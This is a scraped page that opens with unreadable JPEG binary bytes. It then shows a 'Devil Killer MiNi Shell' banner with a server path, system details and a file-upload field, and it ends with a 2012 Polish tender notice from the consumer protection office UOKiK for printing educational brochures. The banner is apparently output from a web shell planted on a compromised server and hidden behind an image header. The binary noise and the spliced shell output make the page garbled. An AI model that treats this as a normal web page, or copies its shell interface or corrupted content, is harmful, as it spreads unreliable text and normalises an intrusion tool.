JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/29546-N-2012.html

<p class="kh_header"><b>Warszawa: Przetarg nieograniczony podzielony na 3 części na: część I. Zmiana w pliku produkcyjnym, druk offsetowy oraz dostawa publikacji o nadanych numerach ISBN i ulotek do siedziby Urzędu Ochrony Konkurencji i Konsumentów w Warszawie, część 
II. Skład, łamanie, adaptacja projektu graficznego, druk cyfrowy oraz dostawa publikacji o nadanych numerach ISBN do siedziby Urzędu Ochrony Konkurencji i Konsumentów w Warszawie, część III. Zmiana w pliku produkcyjnym, druk offsetowy oraz dostawa materiałów edukacyjnych do siedziby Urzędu Ochrony Konkurencji i Konsumentów w Warszawie.</b><br>
<b>Numer ogłoszenia: 29546 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony podzielony na 3 części na: część I. Zmiana w pliku produkcyjnym, druk offsetowy oraz dostawa publikacji o nadanych numerach ISBN i ulotek do siedziby Urzędu Ochrony Konkurencji i Konsumentów w Warszawie, część 
II. Skład, łamanie, adaptacja projektu graficznego, druk cyfrowy oraz dostawa publikacji o nadanych numerach ISBN do siedziby Urzędu Ochrony Konkurencji i Konsumentów w Warszawie, część III. Zmiana w pliku produkcyjnym, druk offsetowy oraz dostawa materiałów edukacyjnych do siedziby Urzędu Ochrony Konkurencji i Konsumentów w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zmiana w pliku produkcyjnym, druk offsetowy, oraz dostarczenie do siedziby UOKiK czterech publikacji oraz trzech ulotek wg następującej specyfikacji technicznej:
1. Młodzi Konsumenci i rynek. Podręcznik dla uczniów szkół ponadgimnazjalnych
format:B5 (176x250 mm), 
okładka: 4+4, kreda 250g, lakier offsetowy dwustronnie,
środek: papier offset 90g, 4+4, 
ilość stron: 20 z okładką, 
oprawa: 2 zszywki, 
nakład: 1 000 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki publikacji.
2. Zakupy z Maksem (komiks)
format: A4 (210 - 297mm), 
okładka: lakierowany karton, 200g, 4+4, 
środek: papier offsetowy 100g, 4+4, 
liczba stron: 16 z okładką, 
oprawa: 2 zszywki, 
nakład: 500 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki publikacji.
3. Młodzi konsumenci i rynek. Podręcznik dla uczniów szkół gimnazjalnych.
format: B5 (176x250 mm)
okładka: papier kreda 250g, lakier offsetowy dwustronnie, 4+4
środek: papier offsetowy 100g, 4+4
liczba stron: 20 z okładką
oprawa: 2 zszywki
nakład: 1 000 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki publikacji.
4. Vademecum konsumenta 
format: B5 (167x237 mm)
okładka: karton lakierowany jednostronnie, 250g, 4+0,
środek: papier offset 100g, 4+4, 
liczba stron: 28 bez okładki, 
oprawa: 2 zszywki
nakład: 500 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki oraz środka publikacji.
5. Rozstrzyganie sporów konsumenckich (ulotka) 
format: B6 (125x176 mm),
papier: kreda błysk 150g, kolor: 4+4,
ilość stron: 16,
oprawa: 2 zszywki
nakład: 1000 szt.
Dokonanie zmiany w pliku publikacji polegającej na zmianie wielkości czcionki w całej ulotce
6. Zakupy przez Internet (ulotka)
format:100x210 mm,
ilość stron: 16,
papier: kreda błysk 150g, 4+4,
oprawa: 2 zszywki
nakład: 2000 szt.,
Dokonanie zmiany w pliku publikacji polegającej na zmianie wielkości czcionki w całej ulotce.
7.  Jak kupować (ulotka)
format:100x210 mm,
ilość stron: 16,
papier: kreda błysk 150g, 4+4,
oprawa: 2 zszywki
nakład: 5000 szt.,
Dokonanie zmiany w pliku publikacji polegającej na zmianie wielkości czcionki całej w ulotce.
1. Termin realizacji: 10 dni roboczych.
2. Pliki produkcyjne, wzory publikacji oraz nowy logotyp UOKiK zostaną przekazane Wykonawcy w dniu podpisania umowy.
3. Wykonawca zobowiązany jest przedstawić Zamawiającemu naniesione zmiany każdej z publikacji i ulotki w ciągu 2 dni roboczych od podpisania umowy. 
4. Zamawiający zobowiązany jest do akceptacji bądź odrzucenia przy jednoczesnym zgłoszeniu uwag do naniesionej zmiany w terminie 2 dni roboczych od dnia ich dostarczenia przez Wykonawcę. 
5. Wraz z dostawą publikacji Wykonawca zobowiązany jest przekazać zmienioną wersję publikacji oraz ulotek w postaci plików produkcyjnych i plików w formacie.pdf - do umieszczenia na stronie internetowej UOKiK oraz zwrócić płytę CD przekazaną w dniu podpisania umowy.
6. Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca wskazanego przez Zamawiającego (I piętro, bez windy).
Część II  skład, łamanie, adaptacja projektu graficznego, druk cyfrowy oraz dostarczenie do siedziby UOKiK publikacji wg następującej specyfikacji technicznej:
Polskie postępowanie antymonopolowe w sprawach kontroli łączenia przedsiębiorców w systemie publicznoprawnej ochrony konkurencji
format: B5 (176x250 mm), 
okładka: 4+0, papier kreda 250g, folia mat. jednostronnie, lakier wybiórczy błysk
środek: papier offset 90g, 1+1 (granatowy odpowiada kolorowi pantone 296c)
ilość stron: 472 + okładka, 
oprawa: miękka, klejona 
nakład: 200 egz.
1. Termin realizacji: 20 dni roboczych.
2. W dniu podpisania umowy Wykonawca otrzyma tekst publikacji w pliku Word, projekt graficzny publikacji, który należy zaadaptować oraz przykładową publikację jako WZÓR.
3. Projekt graficzny do adaptacji stanowi załącznik do SIWZ.
4. Wykonawca zobowiązany jest przedstawić Zamawiającemu skład publikacji w ciągu 5 dni  roboczych od podpisania umowy.
5. Zamawiający zobowiązany jest do akceptacji bądź odrzucenia przy jednoczesnym zgłoszeniu uwag do przedstawionego składu publikacji w terminie 5 dni roboczych od dnia ich dostarczenia przez Wykonawcę. 
6. Wykonawca w przypadku otrzymania od Zamawiającego uwag do przedstawionego składu publikacji zobowiązany jest w terminie 4 dni roboczych przekazać Zamawiającemu skład z uwzględnionymi uwagami do powtórnej akceptacji. 
7. Publikacja posiada numer ISBN.
8. Wraz z dostawą publikacji Wykonawca zobowiązany jest przekazać elektroniczną wersję publikacji w postaci plików produkcyjnych, plików otwartych i plików w formacie.pdf - do umieszczenia na stronie internetowej UOKiK oraz zwrócić płytę CD przekazaną w dniu podpisania umowy.
9. Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca wskazanego przez Zamawiającego (I piętro, bez windy).
Część III zmiana w pliku produkcyjnym, druk offsetowy oraz dostarczenie do siedziby UOKiK materiałów edukacyjnych wg następującej specyfikacji technicznej:
Plakat Infolinia konsumencka
format: A2
papier: kreda matowa 170g, 4+0, lakier dyspersyjny jednostronnie, brak listwowania
nakład: 2 000 szt.
Ulotka typu wizytówka, Infolinia konsumencka
format: 90x55
papier: karton 300g, 4+4, folia błysk dwustronnie
typ: zaokrąglona
nakład: 10 000 szt. 
1. Termin realizacji: 7 dni roboczych.
2. W dniu podpisania umowy Wykonawca otrzyma pliki produkcyjne plakatu i ulotki typu wizytówki.
3. Projekty graficzne stanowią załącznik do SIWZ.
4. Zmiana w plikach plakatu i ulotki typu wizytówka polega na modyfikacji zamieszczonej treści.
5. Wykonawca zobowiązany jest przedstawić Zamawiającemu naniesione zmiany każdej z publikacji i ulotki w ciągu 1 dnia roboczych od podpisania umowy. 
6. Zamawiający zobowiązany jest do akceptacji bądź odrzucenia przy jednoczesnym zgłoszeniu uwag do naniesionej zmiany w terminie 1 dni roboczych od dnia ich dostarczenia przez Wykonawcę. 
7. Wraz z dostawą publikacji Wykonawca zobowiązany jest przekazać zmienioną wersję publikacji oraz ulotek w postaci plików produkcyjnych oraz zwrócić płytę CD przekazaną w dniu podpisania umowy.
8. Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca wskazanego przez Zamawiającego (I piętro, bez windy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej dwa zamówienia odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ (tj. druk publikacji o minimalnej objętości 10 stron o wartości minimum 7 000,00 zł każde - dotyczy Cz. I, skład, łamanie, adaptacja projektu graficznego o wartości minimum 3 000,00 zł każde - dotyczy Cz. II oraz druk ulotek o minimalnej o wartości nie mniejszej niż: 4 000,00 zł brutto każde - dotyczy Cz. III. Wykonawca musi potwierdzić ich należyte wykonanie, poprzez przedstawienie odpowiednich dokumentów wystawionych przez zamawiającego lub odbiorcę dostawy.
Podane wartości muszą dotyczyć jednego zamówienia (przez co rozumie się, że musi
wynikać z jednostkowej umowy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dotyczyć mogą następujących kwestii:

a) osoby uprawnionej do kontaktu lub podpisania protokołu odbioru ze strony        Zamawiającego lub Wykonawcy.
Zmiana dokonana zostanie w przypadku zaistnienia okoliczności faktycznie obiektywnych, które uniemożliwiać będą konkretnej osobie wskazanej w umowie do realizacji jej postanowień, np.: rozwiązanie umowy o pracę, choroba, śmierć pracownika, utrata uprawnień, itp., 
b) stawki podatku VAT, zgodnie w powszechnie obowiązującymi przepisami prawa                      z uwzględnieniem zmiany w całościowym wynagrodzeniu Wykonawcy.
Zmiana dokonana zostanie w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie rozliczeń podatkowych i obowiązujących stawek podatku VAT mających związek z niniejszym przedmiotem zamówienia,
 
Jeżeli w trakcie realizacji umowy Zamawiający lub Wykonawca dojdzie do wniosku, że              w celu właściwej realizacji zamówienia istnieje potrzeba dokonania przewidzianej przez Zamawiającego w SIWZ zmiany postanowień zawartej umowy w stosunku do treści wybranej oferty, to każda ze stron może się zwrócić do drugiej na piśmie z wnioskiem                    o dokonanie takiej zmiany,
Zmiany będą dokonywane na piśmie w postaci aneksu do zawartej umowy po uprzednim wyrażeniu zgody na zmianę przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Ochrony Konkurencji i Konsumentów
00 - 950 Warszawa, Pl. Powstańców Warszawy 1,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2012 godzina 11:00, miejsce: Urząd Ochrony Konkurencji i Konsumentów
00 - 950 Warszawa, Pl. Powstańców Warszawy 1,
Kancelaria pokój nr 116 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zmiana w pliku produkcyjnym, druk offsetowy, oraz dostarczenie do siedziby UOKiK czterech publikacji oraz trzech ulotek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zmiana w pliku produkcyjnym, druk offsetowy, oraz dostarczenie do siedziby UOKiK czterech publikacji oraz trzech ulotek wg następującej specyfikacji technicznej:
1.	Młodzi Konsumenci i rynek. Podręcznik dla uczniów szkół ponadgimnazjalnych
format:B5 (176x250 mm), 
okładka: 4+4, kreda 250g, lakier offsetowy dwustronnie,
środek: papier offset 90g, 4+4, 
ilość stron: 20 z okładką, 
oprawa: 2 zszywki, 
nakład: 1 000 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki publikacji.

2.	Zakupy z Maksem (komiks)
format: A4 (210 x 297mm), 
okładka: lakierowany karton, 200g, 4+4, 
środek: papier offsetowy 100g, 4+4, 
liczba stron: 16 z okładką, 
oprawa: 2 zszywki, 
nakład: 500 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki publikacji.

3.	Młodzi konsumenci i rynek. Podręcznik dla uczniów szkół gimnazjalnych.
format: B5 ( 176x250 mm)
okładka: papier kreda 250g, lakier offsetowy dwustronnie, 4+4
środek: papier offsetowy 100g, 4+4
liczba stron: 20 z okładką
oprawa: 2 zszywki
nakład: 1 000 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki publikacji.

4.	Vademecum konsumenta 
format: B5 (167x237 mm)
okładka: karton lakierowany jednostronnie, 250g, 4+0,
środek: papier offset 100g, 4+4, 
liczba stron: 28 bez okładki, 
oprawa: 2 zszywki
nakład: 500 egz.
Publikacja posiada numer ISBN.
Dokonanie zmiany w pliku produkcyjnym okładki oraz środka publikacji.

5.	Rozstrzyganie sporów konsumenckich (ulotka) 
format: B6 (125x176 mm),
papier: kreda błysk 150g, kolor: 4+4,
ilość stron: 16,
oprawa: 2 zszywki
nakład: 1000 szt.
Dokonanie zmiany w pliku publikacji polegającej na zmianie wielkości czcionki w całej ulotce

6.	Zakupy przez Internet (ulotka)
format:100x210 mm,
ilość stron: 16,
papier: kreda błysk 150g, 4+4,
oprawa: 2 zszywki
nakład: 2000 szt.,
Dokonanie zmiany w pliku publikacji polegającej na zmianie wielkości czcionki w całej ulotce.

7.  Jak kupować (ulotka)
format:100x210 mm,
ilość stron: 16,
papier: kreda błysk 150g, 4+4,
oprawa: 2 zszywki
nakład: 5000 szt.,
Dokonanie zmiany w pliku publikacji polegającej na zmianie wielkości czcionki całej w ulotce.

1.	Termin realizacji: 10 dni roboczych.
2.	Pliki produkcyjne, wzory publikacji oraz nowy logotyp UOKiK zostaną przekazane Wykonawcy w dniu podpisania umowy.
3.	Wykonawca zobowiązany jest przedstawić Zamawiającemu naniesione zmiany każdej z publikacji i ulotki w ciągu 2 dni roboczych od podpisania umowy. 
4.	Zamawiający zobowiązany jest do akceptacji bądź odrzucenia przy jednoczesnym zgłoszeniu uwag do naniesionej zmiany w terminie 2 dni roboczych od dnia ich dostarczenia przez Wykonawcę. 
5.	Wraz z dostawą publikacji Wykonawca zobowiązany jest przekazać zmienioną wersję publikacji oraz ulotek w postaci plików produkcyjnych i plików w formacie .pdf - do umieszczenia na stronie internetowej UOKiK oraz zwrócić płytę CD przekazaną w dniu podpisania umowy.
6.	Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca wskazanego przez Zamawiającego (I piętro, bez windy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Skład, łamanie, adaptacja projektu graficznego, druk cyfrowy oraz dostarczenie do siedziby UOKiK publikacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II  skład, łamanie, adaptacja projektu graficznego, druk cyfrowy oraz dostarczenie do siedziby UOKiK publikacji wg następującej specyfikacji technicznej:

Polskie postępowanie antymonopolowe w sprawach kontroli łączenia przedsiębiorców w systemie publicznoprawnej ochrony konkurencji
format: B5 (176x250 mm), 
okładka: 4+0, papier kreda 250g, folia mat. jednostronnie, lakier wybiórczy błysk
środek: papier offset 90g, 1+1 (granatowy odpowiada kolorowi pantone 296c)
ilość stron: 472 + okładka, 
oprawa: miękka, klejona 
nakład: 200 egz.

1.	Termin realizacji: 20 dni roboczych.
2.	W dniu podpisania umowy Wykonawca otrzyma tekst publikacji w pliku Word, projekt graficzny publikacji, który należy zaadaptować oraz przykładową publikację jako WZÓR.
3.	Projekt graficzny do adaptacji stanowi załącznik do SIWZ.
4.	Wykonawca zobowiązany jest przedstawić Zamawiającemu skład publikacji w ciągu 5 dni  roboczych od podpisania umowy.
5.	Zamawiający zobowiązany jest do akceptacji bądź odrzucenia przy jednoczesnym zgłoszeniu uwag do przedstawionego składu publikacji w terminie 5 dni roboczych od dnia ich dostarczenia przez Wykonawcę. 
6.	Wykonawca w przypadku otrzymania od Zamawiającego uwag do przedstawionego składu publikacji zobowiązany jest w terminie 4 dni roboczych przekazać Zamawiającemu skład z uwzględnionymi uwagami do powtórnej akceptacji. 
7.	Publikacja posiada numer ISBN.
8.	Wraz z dostawą publikacji Wykonawca zobowiązany jest przekazać elektroniczną wersję publikacji w postaci plików produkcyjnych, plików otwartych i plików w formacie .pdf - do umieszczenia na stronie internetowej UOKiK oraz zwrócić płytę CD przekazaną w dniu podpisania umowy.
